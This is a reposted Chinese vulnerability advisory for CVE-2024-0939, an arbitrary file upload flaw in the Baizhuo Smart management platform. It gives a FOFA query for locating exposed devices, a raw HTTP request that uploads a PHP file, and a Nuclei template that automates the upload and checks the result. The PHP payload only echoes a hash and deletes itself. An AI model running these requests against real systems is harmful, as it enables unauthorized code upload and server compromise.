当前位置: 首页 > news >正文

百卓Smart管理平台 uploadfile.php 文件上传漏洞(CVE-2024-0939)

免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

Ⅰ、漏洞描述

百卓 Smart只管理平台是北京百卓网络技术有限公司(以下简称百卓网络)的一款安全网关产品,是一家致力于构建下一代安全互联网的高科技企业。

百卓Smart管理平台 uploadfle.php 接口存在任意文件上传漏洞。恶意攻击者可能利用此漏洞上传而恶意文件,从而导致服务器失陷。

影响版本

smart_s210

smart_s210_firmware

Ⅱ、fofa语句

title="Smart管理平台"

Ⅲ、漏洞复现

POC

POST /Tool/uploadfile.php? HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Upgrade-Insecure-Requests: 1
Connection: close-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="ceshi.php"
Content-Type: application/octet-stream<?php echo md5('666');unlink(__FILE__);?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"/home/ceshi.php
-----------------------------13979701222747646634037182887--

1、构建poc

2、访问

Ⅳ、Nuclei-POC

id: Baizhuo-Smart-uploadinfo:name: 百卓Smart管理平台 uploadfle.php 接口存在任意文件上传漏洞。恶意攻击者可能利用此漏洞上传而恶意文件,从而导致服务器失陷。author: WLFseverity: highmetadata: fofa-query: title="Smart管理平台"
variables:filename: "{{to_lower(rand_base(10))}}"boundary: "{{to_lower(rand_base(20))}}"
http:- raw:- |POST /Tool/uploadfile.php? HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887Upgrade-Insecure-Requests: 1Connection: close-----------------------------13979701222747646634037182887Content-Disposition: form-data; name="file_upload"; filename="{{filename}}.php"Content-Type: application/octet-stream<?php echo md5('666');unlink(__FILE__);?>-----------------------------13979701222747646634037182887Content-Disposition: form-data; name="txt_path"/home/{{filename}}.php-----------------------------13979701222747646634037182887--- |GET /home/{{filename}}.php HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0matchers:- type: dsldsl:- status_code==200 && contains_all(body,"fae0b27c451c728867a567e8c1bb4e53")

Ⅴ、修复建议

升级至安全版本

相关文章:

  • -转换流-
  • 08-Java过滤器模式 ( Filter Pattern )
  • QT设置qss
  • 11 插入排序和希尔排序
  • 《Docker极简教程》--Docker环境的搭建--在Mac上搭建Docker环境
  • C语言使⽤ scanf()函数应注意的问题是什么?
  • 设计模式(结构型模式)桥接模式
  • linux的tree用法
  • 【每日一题】LeetCode——反转链表
  • HCIA-HarmonyOS设备开发认证V2.0-3.轻量系统内核基础
  • vue绘制语音波形图---wavesurfer.js
  • FPS游戏框架漫谈第二十二天
  • 【go】ent操作之CRUD与联表查询
  • uniapp /微信小程序 使用map组件实现手绘地图方案
  • office文件转pdf在线预览
  • 时间复杂度分析经典问题——最大子序列和
  • Centos6.8 使用rpm安装mysql5.7
  • crontab执行失败的多种原因
  • Octave 入门
  • React-生命周期杂记
  • React中的“虫洞”——Context
  • Redis 中的布隆过滤器
  • Spark in action on Kubernetes - Playground搭建与架构浅析
  • ⭐ Unity 开发bug —— 打包后shader失效或者bug (我这里用Shader做两张图片的合并发现了问题)
  • Vue学习第二天
  • 基于Volley网络库实现加载多种网络图片(包括GIF动态图片、圆形图片、普通图片)...
  • 离散点最小(凸)包围边界查找
  • 前端_面试
  • 入职第二天:使用koa搭建node server是种怎样的体验
  • 探索 JS 中的模块化
  • 移动端 h5开发相关内容总结(三)
  • ​软考-高级-系统架构设计师教程(清华第2版)【第9章 软件可靠性基础知识(P320~344)-思维导图】​
  • ​油烟净化器电源安全,保障健康餐饮生活
  • #!/usr/bin/python与#!/usr/bin/env python的区别
  • #QT(智能家居界面-界面切换)
  • #ubuntu# #git# repository git config --global --add safe.directory
  • #我与Java虚拟机的故事#连载13:有这本书就够了
  • (1) caustics\
  • (14)Hive调优——合并小文件
  • (LNMP) How To Install Linux, nginx, MySQL, PHP
  • (八)c52学习之旅-中断实验
  • (编译到47%失败)to be deleted
  • (附源码)ssm高校实验室 毕业设计 800008
  • (经验分享)作为一名普通本科计算机专业学生,我大学四年到底走了多少弯路
  • (理论篇)httpmoudle和httphandler一览
  • (六)什么是Vite——热更新时vite、webpack做了什么
  • (每日持续更新)jdk api之FileFilter基础、应用、实战
  • (牛客腾讯思维编程题)编码编码分组打印下标题目分析
  • (入门自用)--C++--抽象类--多态原理--虚表--1020
  • (一)基于IDEA的JAVA基础10
  • (原創) 物件導向與老子思想 (OO)
  • .[hudsonL@cock.li].mkp勒索病毒数据怎么处理|数据解密恢复
  • .NET 8.0 发布到 IIS
  • .net6Api后台+uniapp导出Excel
  • .NET面试题解析(11)-SQL语言基础及数据库基本原理